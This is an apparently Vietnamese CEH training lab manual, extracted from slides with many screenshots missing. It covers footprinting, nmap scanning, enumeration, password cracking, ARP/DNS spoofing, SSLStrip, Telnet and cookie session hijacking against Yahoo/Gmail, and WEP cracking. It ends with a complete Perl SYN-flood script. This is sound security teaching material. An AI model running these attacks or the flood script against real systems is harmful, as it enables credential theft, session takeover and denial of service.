tailieuthuchanh ceh
DESCRIPTION
Thuc hanh CEHTRANSCRIPT
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
FOOTPRINTING
I. Domain: 1. Liệt kê các Top Level Domain (TLDs): gTLDs, ccTLDs,…
Truy cập vào link sau: http://www.iana.org/domains/root/db/
2. Whois: Tìm thông tin đăng ký tên miền sau: cehlab.comCách 1: Tìm từng bước
Lưu Hành Nội Bộ 1
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
a. Tìm thông tin nhà đăng ký (Registrar)
Registrar: NAME.COM LLCWHOIS: whois.name.com
Lưu Hành Nội Bộ2
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
b. Whois:
Cách 2: Tìm tại trang: http://Who.is
Lưu Hành Nội Bộ 3
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Liệt kê: thử nghiệm zone transfer:
Kết quả:- 3 (A) record: www, vpn- 2 (MX) record,…
II. IP: 1. Liệt kê 5 RIRs (Regional Internet Registry): http://www.iana.org/numbers/
Lưu Hành Nội Bộ4
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
2. Whois IP:
Lưu Hành Nội Bộ 5
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
3. Reverse Domain Lookup: tìm kiếm thông qua các search enginehttp://myipneighbors.com | http://yougetsignal.com
Lưu Hành Nội Bộ6
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Các thông tin được lấy thông qua cache, nên một số Domain có thể đã chuyển sang vị trí mới. Nên kiểm tra lại trước khi sử dụng.III. Email, URLs, Phone, Fax: - Trích xuất từ website của hệ thống đích: Công cụ: Web Data Extractor
Lưu Hành Nội Bộ 7
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
- Tìm qua các search engine: 1st Email Address Spider, mức độ chính xác thấp hơn cách trên.
Lưu Hành Nội Bộ8
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
IV. Trace:
Dùng lệnh tracert trên windows kiểm tra đường đi đến server www.cehlab.comTracert dùng gói tin TTL expired để xác định các node. Kiểm tra cho kết quả bên dưới:
Node thứ 3 trả lời do TTL expired
Lưu Hành Nội Bộ 9
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
SCANNING
I. Giới thiệu Protocols: Đọc và ghi nhận các giá trị trong header của 4 protocol sau:1. IP:
Lưu Hành Nội Bộ10
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
2. ICMP:
Lưu Hành Nội Bộ 11
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
3. TCP:
Lưu Hành Nội Bộ12
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
4. UDP:
Lưu Hành Nội Bộ 13
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
II. Monitoring: 1. Dùng Wireshark theo dõi quá trình gửi và nhận gói ICMP:
Hãy ghi lại các thông tin sau: Ethernet:
- Source MAC:………………………………………..- Destination MAC:…………………………………..- Type:………………………………………………...
IP:- Protocol:…………………………………………….- Identification:……………………………………….
ICMP:- Type:………………………………………………..- Code:……………………………………………….
Lưu Hành Nội Bộ14
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com 2. Phân tích quá trình 3-way handshake TCP:
a. Mở Wiresharkb. Truy cập website nhatnghe.comc. Lọc thông tin theo hướng dẫn bên dưới:
Hãy ghi lại các thông tin TCP Header của 4 packets đầu tiên theo yêu cầu sau:Packet 1:
- Source Port:- Destination Port:- Sequense number:- Acknowledgement number:- Flags:- Window:
Packet 2:- Source Port:- Destination Port:- Sequense number:- Acknowledgement number:- Flags:- Window:
Packet 3:- Source Port:- Destination Port:- Sequense number:- Acknowledgement number:- Flags:- Window:
Lưu Hành Nội Bộ 15
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com III. Scanning:
1. IP Protocol: Nmap –sO <IP>
Vd: nmap –sO 192.168.1.200
Starting Nmap 5.21 ( http://nmap.org ) at 2010-03-01 11:15 SE Asia Standard Time Nmap scan report for 192.168.1.200 Host is up (0.0018s latency). Not shown: 251 closed protocols PROTOCOL STATE SERVICE 1 open icmp 2 open|filtered igmp 6 open tcp 17 open udp 255 open|filtered unknown MAC Address: 00:12:F0:4E:7B:7B (Intel Corporate) Nmap done: 1 IP address (1 host up) scanned in 1.60 seconds
2. UDP Port: Nmap –sU <IP>
Vd: nmap -sU 192.168.1.200
Starting Nmap 5.21 ( http://nmap.org ) at 2010-03-01 11:13 SE Asia Standard Time Nmap scan report for 192.168.1.200 Host is up (0.0010s latency). Not shown: 991 closed ports PORT STATE SERVICE 123/udp open|filtered ntp 137/udp open netbios-ns 138/udp open|filtered netbios-dgm 445/udp open|filtered microsoft-ds 500/udp open|filtered isakmp 1027/udp open|filtered unknown 1434/udp open|filtered ms-sql-m 3456/udp open|filtered IISrpc-or-vat 4500/udp open|filtered nat-t-ike MAC Address: 00:12:F0:4E:7B:7B (Intel Corporate) Nmap done: 1 IP address (1 host up) scanned in 7.93 seconds
Ghi chú: có thể dùng thêm các tham số sau-reason: chú thích-p <port>: chỉ định port quét-PN: không ping
Trong trường hợp cổng đích đóng, gói tin UDP sẽ được gửi trả về theo giao thức ICMP, xem hình sau:
Lưu Hành Nội Bộ16
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
3. TCP port:Xem bảng tóm tắt sau:
Lưu Hành Nội Bộ 17
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Phân tích các kiểu quét TCP port rồi rút ra kết luận:
a. SYN Scan:
b. NULL Scan:
Lưu Hành Nội Bộ18
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
c. XMAS Scan:
d. ACK Scan:
Lưu Hành Nội Bộ 19
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
e. FIN Scan:
f. ILDE Scan:
Lưu Hành Nội Bộ20
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
V. Version Detection:
1. Banner grabbing: dùng Telnet client để lấy banner ứng dụngTelnet <IP> <port>
Vd:Telnet 192.168.1.200 21
2. Dùng nmap với tham số: -sV (theo dõi bằng Wireshark và đưa ra cách thực hiện)
Mặc dù đã thay đổi cổng dịch vụ Remote Desktop (3003) nhưng vẫn có thể xác định được.Kết luận: nên bảo mật trên ứng dụng.
VI. OS Finger Printing:
Nmap –O <IP>
Lưu Hành Nội Bộ 21
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Lưu Hành Nội Bộ22
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
ENUMERATION
I. Null session: 1. Phân tích SID trên Windows:
Tạo tài khoản mới và kiểm tra:
Lưu Hành Nội Bộ 23
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
2. Enumeration SID từ 500-2000:
Nhập IP máy mục tiêu:
Kết nối: - Trong trường hợp máy đích là DC cấu hình mặc định có thể sử dụng Null- Nếu là Windows XP, 2003 Station: sử dụng 1 account bất kỳ
Lưu Hành Nội Bộ24
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Nhập dãy SID cần liệt kê:
SID:500: teo
Lưu Hành Nội Bộ 25
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Sử dụng account bất kỳ để tìm Share resource (ẩn):
II. SNMP:
Lưu Hành Nội Bộ26
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com SNMP là giao thức dùng quản lý các thiết bị, Community string
thông dụng là: Public, Private.
Các thông tin liệt kê: Account, Share, Service,…
Lưu Hành Nội Bộ 27
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Sử dụng MIB Viewer tải FTP MIB trên hệ thống đích:
Lưu Hành Nội Bộ28
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
PASSWORD CRACKING
I. Offline Password cracking:
1. Xây dựng Rainbow Tables: Mở Winrtgen nhấn Add table
Lưu Hành Nội Bộ 29
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Chọn thông số theo hình sau: 4 Tables, LM Hash
2. Trích xuất LM/NTLM Hash: LC5 Password: không có
Lưu Hành Nội Bộ30
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Password: nhatnghe
Dùng PWDump:
Lưu Hành Nội Bộ 31
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
3. Tìm kiếm Password từ Rainbow Tables:
- Mở Ophcrack PWDump file: luu.txt
Lưu Hành Nội Bộ32
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
- Nhấn Table để thêm table vào danh sách:
- Chọn Install:
- Chọn Crack:
Lưu Hành Nội Bộ 33
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
II. Online Password cracking: Sử dụng một số giao thức chứng thực trực tiếp để tìm mật khẩu hệ thống đích. Một số giao thức
tiêu biểu: FTP, Telnet, POP3, RDP, …
Lưu Hành Nội Bộ34
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Chọn Charset:
Kết quả:
Lưu Hành Nội Bộ 35
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
SNIFFERS
Môi trường Switch:I. MAC Flooding:
1. Mở Interface LAN Install: Protocol
2. Nhấn Have Disk chọn file: EthDrv.inf
3. Hoàn tất
Lưu Hành Nội Bộ36
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
4. Flooding:
II. ARP Spoofing: (Main in The Middle)
1. Xem hình bên dưới:
Lưu Hành Nội Bộ 37
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
2. Sử dụng phần mềm Cain & Abel ARP spoofing:- Máy Victim: xem ARP cache hiện hành
- Máy Attacker: xem MAC address, dùng địa chỉ này để gửi
Mở Cain & Abel Chọn tab Sniff Nhấn +
Lưu Hành Nội Bộ38
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Danh sách các Host:
Chọn Tab APR nhấn +:
Enable Poisoning:
Lưu Hành Nội Bộ 39
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
- Máy Victim:
Truy cập FTP vào xem kết quả:
3. DNS Spoofing:
Chọn: APR-DNS Nhấn +
Lưu Hành Nội Bộ40
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Nhập theo bên dưới:
-Máy Victim:
Lưu Hành Nội Bộ 41
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
4. Sniff và SSL:Máy Victim truy cập vào https://login.yahoo.comCain & Abel tạo Fake Certificate:
Lưu Hành Nội Bộ42
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Do đây là self-sign Certificate nên không được trust với máy victim Yes
Lưu Hành Nội Bộ 43
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Kết quả:
5. SSLStrip:- Boot bằng Backtrack, gán IP theo lệnh sau:
Lưu Hành Nội Bộ44
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com ifconfig eth0 <IP>route add default gw <GW>echo nameserver <DNS Server> >/etc/resolv.conf
- Cấu hình Redirect:
- ARPSpoofing:
- Kết quả:
Lưu Hành Nội Bộ 45
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Mật khẩu đăng nhập:
Lưu Hành Nội Bộ46
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
SESSION HIJACKING
I. Networking:
1. Client thực hiện Telnet đến Server:
2. Attacker mở Hunt:
- Chọn d a a
Lưu Hành Nội Bộ 47
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Nhập địa chỉ IP: Server+Client
Mở mode relay: s. Trở về menu chính: xx
Nhập: l để xem các kết nối hiện hành:
Lưu Hành Nội Bộ48
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
- Hijack bằng chức năng: a
- Nhấn phím bất kỳ để Hijacking:
Kết quả: Hoàn toàn kiểm soát được kết nối của Client.
Lưu Hành Nội Bộ 49
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
II. Application: 1. User đăng nhập Yahoo mail:
Lưu Hành Nội Bộ50
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
2. Dùng kỹ thuật ARP Spoofing + Ferret (hoặc Wireshark) để ghi cookie:
3. Ferret sẽ ghi vào file Hamster.txt:
Lưu Hành Nội Bộ 51
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
4. Sử dụng Cookie Editor để add cookie vừa ghi được:
Giao diện Cookie Editor Add:
Lưu Hành Nội Bộ52
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Nhập 2 Cookie: T & Y (Yahoo), GX (Gmail),…
Truy cập http://mail.yahoo.com để xem kết quả!
Lưu Hành Nội Bộ 53
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Kết hợp với Hamster:Chạy thêm Hamster, cấu hình proxy cho webbrowser theo thông số sau:
Đặt trang chủ về:
Lưu Hành Nội Bộ54
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
Click vào IP và xem kết quả:
Lưu Hành Nội Bộ 55
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
WIRELESS
I. Chuẩn bị: 1. Xem thông tin WLAN Interface:
2. Chuyển Monitor Mode:
3. Kiểm tra: iwconfig
Lưu Hành Nội Bộ56
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
4. Xác định thông tin Access Point:airodump-ng ath0
II. WEP Cracking:1. Sniffer:
2. Chú ý cột Data
Lưu Hành Nội Bộ 57
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
3. Data>=10000:
4. Cracking:Aircrack-ng wep-01.cap
Trường hợp không có máy trạm, không có trao đổi trên đường truyền:
2.1. Tạo station:
Lưu Hành Nội Bộ58
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
2.2. Tìm và gửi trả lại gói tin ARP nhằm tăng lưu lượng, dùng cho phương pháp PTW:
Denial of Service
I. Network: SYN FLOOD:
1. Kiểm tra các cổng trước khi thực hiện:
Lưu Hành Nội Bộ 59
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
2. Truy cập website:
Lưu Hành Nội Bộ60
TRUNG TÂM ĐÀO TẠO MẠNG MÁY TÍNH NHẤT NGHỆ ĐỐI TÁC ĐÀO TẠO CỦA MICROSOFT TẠI VIỆT NAM 105 Bà Huyện Thanh Quan, Q3, TP. HCM Tel: 9.322.735 – 0913.735.906 Fax: 9.322.734 www.nhatnghe.com
3. Tạo và gửi SYN:
Xây dựng công cụ SYN Flood bằng Perl:
tra:
Lưu Hành Nội Bộ 61
#!/usr/bin/perl# Requires perl, Net::RawIP module, and root privileges
use Net::RawIP;
if($#ARGV == 2) { ($src,$dst,$port) = @ARGV; $a = new Net::RawIP; while(1) { $src_port = rand(65534)+1; $a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn => 1}}); $a->send; }} else { print "./synflooder source_ip destination_ip destination_port\n";}
